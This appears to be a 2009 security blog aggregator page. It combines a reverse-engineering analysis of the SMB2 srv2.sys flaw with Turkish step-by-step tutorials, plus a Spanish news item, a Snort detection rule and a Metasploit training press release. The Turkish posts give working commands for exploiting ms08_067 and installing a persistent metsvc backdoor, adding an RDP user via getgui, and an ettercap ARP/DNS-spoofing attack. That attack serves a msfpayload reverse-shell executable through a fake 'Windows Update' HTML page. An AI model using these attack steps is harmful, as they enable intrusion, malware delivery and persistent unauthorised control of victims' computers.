The srsv2.sys driver maintains an internal list of “service providers” that provide different services, including validation and execution. This list is initialized in DriverStart() by calling Smb2ProviderRegister(), which calls another routine, SrvRegisterProvider(), which maintains a global list of providers within the driver. The SrvRegisterProvider() routine takes the following structure in addition to a callback as arguments:

.text:0001235B ; int __stdcall Smb2ProviderRegister() .text:0001235B _Smb2ProviderRegister@0 proc

.text:0001235B push    2

.text:0001235D push    3050h

.text:00012362 push    offset _Smb2ValidateProviderCallback@4 ; Smb2ValidateProviderCallback(x)

.text:00012367 push    offset _Smb2ValidateProviderName ; "Smb2Validate"

.text:0001236C call    _SrvRegisterProvider@16 ; SrvRegisterProvider(x,x,x,x

_Smb2ValidateProviderName:

.data:0002D164 _Smb2ValidateProviderName dw 18h        ; DATA XREF: Smb2ProviderRegister()+C o

.data:0002D166                 dw 18h

.data:0002D168                 dd offset aSmb2validate ; "Smb2Validate"

The SrvRegisterProvider() routine is also responsible for the initialization of a 36-byte structure. I didn’t reverse engineer the entire structure, but there are a few important offsets noted in the comments:

.data:0002D138 _NullProvider   dw 0Ah                  ; DATA XREF: SrvInitializeProviderList() o

.data:0002D138                                         ; SrvCleanupProviderList()+D o

.data:0002D13A                 dw 0

.data:0002D13C                 dd 0DCh

.data:0002D140                 dw 24h

.data:0002D142                 dw 0

.data:0002D144                 dd 1

.data:0002D148                 dd offset _NullProviderName ; (struct ProviderName *)p_providerName

.data:0002D14C                 dd 0                    ; (struct Provider *)p_next

.data:0002D150                 db    0

.data:0002D151                 db    0

.data:0002D152                 db    0

.data:0002D153                 db    0

.data:0002D154                 dd 0FFFFFFFFh

.data:0002D158                 dd offset _NullProviderCallback@4 ; Provider callback routine

The _NullProviderName is a pointer to a provider name structure similar to the one passed as an argument to _SrvRegisterProvider(). The NULL provider above (_NullProvider) is the first provider initialized by SrvInitializeProviderList() (and used in cleanup code); it is also the first entry in a linked list of provider structures. The service provider list (_SrvProviderList) is first initialized with a pointer to this NULL entry. Each call to _SrvRegisterProvider() will subsequently add a new entry to the end of the linked list.

At this point we understand that the provider which leads to the vulnerable code is going to be added to a linked list with the other 3 providers. We can then move on to SrvProcessPacket() where we see this structure is accessed:

PAGE:0002FA40 mov     eax, _SrvProviderList

PAGE:0002FA45 mov     [esi+15Ch], eax

PAGE:0002FA62

PAGE:0002FA62 loc_2FA62:              ;

PAGE:0002FA62 mov     eax, [esi+15Ch] ; EAX = &cur_provider;

PAGE:0002FA68 mov     ecx, [eax+1Ch]

PAGE:0002FA6B test    [esi+158h], ecx

PAGE:0002FA71 jz      short loc_2FA7E

PAGE:0002FA73 push    esi

PAGE:0002FA74 call    dword ptr [eax+20h] ; cur_provider->CallBack()

PAGE:0002FA77 cmp     eax, STATUS_MORE_PROCESSING_REQUIRED

PAGE:0002FA7C jnz     short loc_2FA99

PAGE:0002FA7E

PAGE:0002FA7E loc_2FA7E:              ;

PAGE:0002FA7E mov     eax, [esi+15Ch] ; EAX = &cur_provider

PAGE:0002FA84 mov     eax, [eax+14h]

PAGE:0002FA87 cmp     eax, edi        ; EDI = 0

PAGE:0002FA89 mov     [esi+15Ch], eax ; cur_provider = cur_provider->next

PAGE:0002FA8F jnz     short loc_2FA62

The code above is initializing a variable with a pointer to the head of the linked list of providers (_NullProvider), then iterating through the list to discover if it needs to take action. This is the point where the vulnerable routine is called. The validation routine will first be called via Smb2ValidateProviderCallback(), and if more processing is required and no error occurs (which will be the case with most, if not all of the callbacks in the validation provider), STATUS_MORE_PROCESSING_REQUIRED will be returned and the next call will be to the _Smb2ExecuteProviderCallback() routine, which is the Smb2Execute provider that is registered after the validation provider.

The structure pointed to by ESI in the code above is heavily used throughout the code and wasn’t fully reversed. It is a 0×410 byte structure that is initialized by SrvAllocateWorkItemForConnection() and contains some data used to maintain the work queue. At the base of the structure is a pointer to the actual data from the packet.

The SrvProcessPacket() routine will eventually be called by SrvReceiveHandler(), which was registered in the device extension array inside of srvnet.sys. Once SrvProcessPacket() is called, the faulting routine will be reached after some more processing. It is important to remember that this will only occur if SrvNegotiateHandler() is successful, meaning the SMB command must be 0×72.

The vulnerable routine, Smb2ValidateProviderCallback(), begins by checking the first 4 bytes of the buffer for two different versions of the SMB header:

.text:000172F8

.text:000172F8 loc_172F8:

.text:000172F8 mov     edx, [esi]

.text:000172FA cmp     edx, 'BMS¦'

.text:00017300 jz      short loc_17343

.text:00017302 cmp     edx, 424D53FFh ; BMS\xFF

.text:00017308 jnz     short loc_1731A

The routine then proceeds down to perform various processing depending on what the version in the SMB header was, eventually pulling the WORD from the SMB packet and using it in the index as demonstrated earlier.

From: http://www.secureworks.com/research/threats/windows-0day

Metasploit Unleashed - Mastering The Framework

Br3n0 — Thu, 01 Oct 2009 02:39:49 +0000

Um curso muito bom sobre o Metasploit (pra quem não sabe o que é o GOOGLE ajuda), que fala muita coi

Metasploit ile Backdoor Birakmak

IRQ — Wed, 30 Sep 2009 21:06:44 +0000

Meterpreter ile oturum actigimiz hedef sistemde Alexander Sotirov un metsvc backdoorunu nasil birakacagimizi gorecegiz.

Oncelikle backdooru karsiya atabilmek icin gerekli islemleri yapalim

terminali acip ;

cd /tmp/

wget http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip

backdooru tmp klasorune indirdik.

mkdir msvc

cd /msvc/

komutlari ile olusturdugumuz msvc klasorune geldik.

unzip /tmp/metsvc-1.0.zip

zipli dosyalari /tmp/ icerisine cikardik.

Bu dosyalar arasindan gerekli olan metsvc-server.exe , metsvc.exe ve framework/data icerisinden metsrv.dll dosyalarini /tmp/ klasorune asagidaki komutlarla atalim ;

cp metsvc-1.0/metsvc-server.exe /tmp/metsvc-server.exe

cp metsvc-1.0/metsvc.exe /tmp/metsvc.exe

cp /pentest/exploits/framework3/data/meterpreter/metsrv.dll /tmp/metsrv.dll

Metasploit kullanarak hedef sisteme eristik, ornek bir saldiri ;

Metasploit Framework 3 e konsol uzerinden eristik ,

use exploit/windows/smb/ms08_067_netapi

Burda use komutu ile exploit kullanilacagi tanimlaniyor windows/smb exploitin bulundugu kategoriler ve ms08_067_netapi exploiti tanimlaniyor. Bu windows/browser veya baska birseyde olabilir yukardaki sadece bir ornek.

Kullanilacak exploiti tanimladiktan sonra,

show options

komutu ile gerekli ayarlari gorebiliriz.Genel olarak ihtiyac duyulan 3 sey var ; hedef ile baglantimizi saglayacak olan
PAYLOAD hedef RHOST saldirgan LHOST.Su sekilde tanimliyoruz ;

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST X.Y.Z.D

set RHOST X.Y.Z.E

Not: Sabit sekilde bu degerleri tanimlamak icin kullanabilecegimiz komut ;

setg

son olarak ;

exploit

komutu ile hedefi exploit ediyoruz.

Hedefte kullandigimiz acik mevcut ise acilan oturumda backdooru atmak icin WINDOWS icerisinde kendimize bir klasor olusturuyor ve daha once /tmp/ klasorune attigimiz gerekli dosyalari buraya upload ediyoruz.

cd C:/WINDOWS

mkdir irq

cd irq

upload /tmp/metsvc.exe c:/WINDOWS/irq

upload /tmp/metsvc-server.exe c:/WINDOWS/irq

upload /tmp/metsrv.dll c:/WINDOWS/irq

Kuruluma hazir hale geldi.
Not : Upload komutunun kullanimi “upload yollanacak_dosya gidecegi_adres” seklinde.Bu asamada bir trojan upload edip hatta bunu “Startup” klasorune kopyalayip sistemin acilisinda baglanti saglayabiliriz.

execute -f cmd -c

interact 1

komutlari ile komut satirina erisiyor,

cd C:/WINDOWS/irq

metsvc.exe install-service

komutlari ile backdoorumuzu kuruyoruz.Metsvc nin bize baglanmasi icin multi handler i kullanacagiz.

Az once “use” komutu ile exploit tanimlamistik simdi ;

back

use multi/handler

komutlari ile multi handler i aktif ediyoruz.

Burda kullanacagimiz ayarlar sabit ;

set PAYLOAD windows/metsvc_bind_tcp

set LPORT 31337

set RHOST X.Y.Z.E

son olarak

exploit

komutunu kullandigimizda metsvc nin bize baglandigini gorebiliriz.

Metasploit ile Uzak Masaüstü

IRQ — Wed, 30 Sep 2009 20:21:23 +0000

Metasploit ile hedef sistemi exploit edip oturum actik. Komutlar ile ugrasamam ben aradigim seyi Mouse ile bulmak istiyorum derseniz Metasploit in Uzak Masaustu baglantisi kurmak icin kullanimi gayet basit bir ozelligi mevcut.

Meterpreter oturumunda ;

run getgui -u irq -p irq

komutu ile Uzak Masaustu baglantisi kurmak icin kullanici tanimliyoruz.

-u = ile tanimladigimiz kullanici adi
-p = ile tanimladigimiz sifre

Kullaniciyi ekledikten sonra terminali acip ;

rdesktop -u irq -p cigicigi 192.168.2.3

komutu ile baglantiyi gerceklestiriyoruz.

Back Track 4 ile Network Hacking

IRQ — Wed, 30 Sep 2009 20:11:20 +0000

MITM (Man in the Middle) saldirisi ve Ettercap in dns spoof eklentisini kullanarak hedef aldigimiz sistemi ag uzerinden kendi web serverimiza yonlendirip zararli dosya bulastirmayi uygulayacagiz.

Oncelikle Dns gibi davranmak icin ip adresimizi ettercap in ayarlarinda tanimlayalim.

Terminali acip ;

nano /usr/share/ettercap/etter.dns

komutu ile

* A 192.168.2.2

satir olarak tanimliyoruz varsa diger sunuculari silebilirsiniz.

Hedef ile baglantimizi saglayacak exe yi Metasploitin Msfpayload ozellgini kullanarak olusturuyoruz.Windows-KB174529-x86-ENU.exe ismi gercekligi yansitsin diye koydum kaydedecegi yer olarakta /var/www tanimladim bu komutu uygulamadan once web servisini Services/HTTPD/Start HTTPD altindan baslatiyoruz.

cd /pentest/exploits/framework3

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.2 X > /var/www/Windows-KB174529-x86-ENU.exe

Multi Handleri acip gerekli ayarlari yapiyoruz.

./msfconsole

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.2.2

exploit

Son olarak Ettercap ile saldiriya gecioyoruz ;

ettercap -i wlan0 -T -q -P dns_spoof -M ARP /192.168.2.1/ /192.168.2.3/

-i ” ile internete bagli oldugum arayuzu tanimladim “wlan0″, kullandiginiz arayuzu ve ag gecidini ogrenmek icin komut satirina ;

ifconfig

yazmaniz yeterli.

Baglantiyi kendimize yonlendirdik. Web Serverimizdaki index dosyamizi duzenleyelim. /var/www/ icerisinde index.html dosyasini metin editor ile acip asagidaki kodlari yapistirip kaydedelim.

<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″ />
<title>Windows Update</title>
<style type=”text/css”>
<!–
.style {
font-family: Arial, Helvetica, sans-serif;
font-weight: bold;
font-size: 24px;
color: #9999999;
}
–>
</style>
</head>
<body>
<p align=”center”><u>Critical Vulnerability</> in Windows Xp, Vista & Windows 7 <br />Download and Installation of upgrade required.</>
<p align=”center”>
<input align=”center” type=”button” value=”Download Update”
onClick=”window.open(‘/Windows-KB174529-x86-ENU.exe’,'download’); return false;”></p>
</body>
</html>

Goruntusu su sekilde ;

Hedef browseri acip herhangi bir web sitesini ziyaret etmek istediginde bu sayfa ile karsilasacak.Download Update e tiklayip indirdigi dosyayi calistirdigi anda Multi Handler ile baglanti gerceklesecek.

Bu baglantiyi kalici kilmak icin ;

Metasploit ile Kalici Backdoor Birakmak
Saldirida kullandigimiz adresler ;

192.168.2.1 = Ag Gecidi
192.168.2.2 = Saldirgan
192.168.2.3 = Hedef

Se hace público un exploit para una brecha crítica en Windows

komz — Wed, 30 Sep 2009 09:39:13 +0000

Se ha hecho público un nuevo código de ataque que explota una brecha crítica en el sistema operativo Windows, presionando así a Microsoft para que cubra la vulnerabilidad antes de que el problema llegue a provocar una epidemia de gusanos informáticos.

La vulnerabilidad se conocía desde el 7 de septiembre, pero los programas públicamente disponibles hasta el momento que permitían aprovecharla para atacar a los PC no tenían más consecuencia que bloquear el funcionamiento de Windows. Ahora, sin embargo, un nuevo ataque desarrollado por Stephen Fewer, investigador senior de Harmony Security permite a los atacantes correr software no autorizado sobre las máquinas, generando un problema más serio. El código de Fewer ha sido añadido al kit de testing de penetración open source Metasploit.

Hace dos semanas, otra compañía, denominada Immunity, desarrolló su propio código de ataque para esta brecha, pero sólo lo facilitó a sus suscriptores de pago. Por el contrario, el de Metasploit puede ser descargado por cualquier interesado.

Este último software de explotación funciona sobre Windows Vista Service Pack 1 y 2, así como sobre el servidor Windows 2008 SP1 y Windows 2008 Service Pack 2. A diferencia de Conficker, sin embargo, no afecta a Windows XP, Windows Server 2003 y Windows 2000.

La vulnerabilidad que explota ha sido ya resuelta en Windows 7, pero de momento no se sabe si Microsoft tendrá listo el parche correspondiente para las versiones de su sistema operativo afectadas a tiempo de incluirlo en su próximo boletín mensual de seguridad, que será emitido el próximo 13 de octubre.

fuente: csospain.es

Metasploit SMB2.0 exploit detection rule

kimms17 — Wed, 30 Sep 2009 08:54:17 +0000

alert any any -> any 445 (flow:established, to_server; content:”|00000352ff534d4272000000001853c81702|”; offset:0; depth:18)

Offensive Security Releases Free Online Information Security Training to Benefit Charity

tweetycoaster — Wed, 23 Sep 2009 02:47:32 +0000

Offensive Security, the leading information security training company, along with the community behind BackTrack, the worlds leading penetration testing toolset, are proud to announce a brand new free online information security training based on the popular exploitation framework, Metasploit. North Carolina (PRWEB) September 21, 2009 — The long awaited course entitled Metasploit Unleashed has been released today from the online Information Security training experts, Offensive Security. From the time when Metasploit was released in 2003, it has become one of the single most useful information security tool freely available to security professionals today. From a wide array of commercial grade exploits and an extensive exploit development environment, all the way to network information gathering tools and web vulnerability plug-ins. The Metasploit Framework (MSF) provides a truly impressive environment for IT security Professionals. The MSF is far more than just a collection of exploits – it’s an infrastructure that one can build upon and utilize for custom needs. This allows the user to concentrate on their unique environment, and not have to reinvent the wheel. However, for a long time there has been a gap in good, approachable and affordable information security training for the Metasploit Framework. With little to no resources, it was too easy to overlook many of the strong and powerful features that this tool provides. That is all about to change with the introduction of this new free online information security training course. Offensive Security is supporting this free course with the first official certification for Metasploit and videos that can be optionally purchased. All proceeds from this will be given to Hackers for Charity to help underprivileged children in East Africa. Through a heart-warming effort by several security professionals, we are proud to present the most complete and in-depth open course about the Metasploit Framework. Chris Hadnagy, lead social engineer from social-engineer.org says, “What Offensive Security and the security community has created here is truly an information security work of art and the fact that all of this is for charity, makes it especially heartwarming.” This course will cover from the basics of MSF usage, client side attacks, social engineering attacks, egghunter mixins, extending the framework and much more. The course walks the student from setting up the lab right down to performing every exploit and truly Mastering the Framework. It will prove to change the way people view the Metasploit Framework.

source : http://www.prweb.com/releases/information-security/metasploit/prweb2912704.htm